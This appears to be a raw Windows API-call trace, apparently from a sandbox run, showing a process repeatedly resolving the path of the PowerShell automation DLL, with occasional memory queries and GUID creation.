	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.658] VirtualQuery (in: lpAddress=0xeb520, lpBuffer=0xec3e0, dwLength=0x30 | out: lpBuffer=0xec3e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.658] VirtualQuery (in: lpAddress=0xeb5b0, lpBuffer=0xec470, dwLength=0x30 | out: lpBuffer=0xec470*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.659] VirtualQuery (in: lpAddress=0xeb7d0, lpBuffer=0xec690, dwLength=0x30 | out: lpBuffer=0xec690*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.660] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x4e16d6f8, Data2=0xf37, Data3=0x4aff, Data4=([0]=0xbc, [1]=0xae, [2]=0x75, [3]=0x9b, [4]=0xb2, [5]=0x2e, [6]=0x2, [7]=0x5c))) returned 0x0
	[0101.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.661] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x36932224, Data2=0xa231, Data3=0x4e23, Data4=([0]=0xa4, [1]=0x8f, [2]=0x6d, [3]=0x3b, [4]=0x11, [5]=0x64, [6]=0xf, [7]=0x68))) returned 0x0
	[0101.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.662] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xdc179389, Data2=0xa47c, Data3=0x4acd, Data4=([0]=0xb2, [1]=0xb8, [2]=0x21, [3]=0xcb, [4]=0xf4, [5]=0x6e, [6]=0x4, [7]=0x3f))) returned 0x0
	[0101.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.663] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x623c2d97, Data2=0x59e6, Data3=0x4ae4, Data4=([0]=0xb4, [1]=0x6, [2]=0x23, [3]=0xc3, [4]=0x13, [5]=0x25, [6]=0x51, [7]=0x53))) returned 0x0
	[0101.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.664] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xcfbe0e56, Data2=0x2209, Data3=0x4917, Data4=([0]=0xac, [1]=0x4, [2]=0x8a, [3]=0x28, [4]=0x8b, [5]=0x35, [6]=0x9c, [7]=0x38))) returned 0x0
	[0101.665] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x1595a94d, Data2=0xad37, Data3=0x43c6, Data4=([0]=0xb6, [1]=0x25, [2]=0x2d, [3]=0x7d, [4]=0xe2, [5]=0x1, [6]=0xbd, [7]=0x79))) returned 0x0
	[0101.665] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x16198496, Data2=0x44dd, Data3=0x45cf, Data4=([0]=0xa0, [1]=0x19, [2]=0x78, [3]=0xe, [4]=0x67, [5]=0xb3, [6]=0x32, [7]=0x88))) returned 0x0
	[0101.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
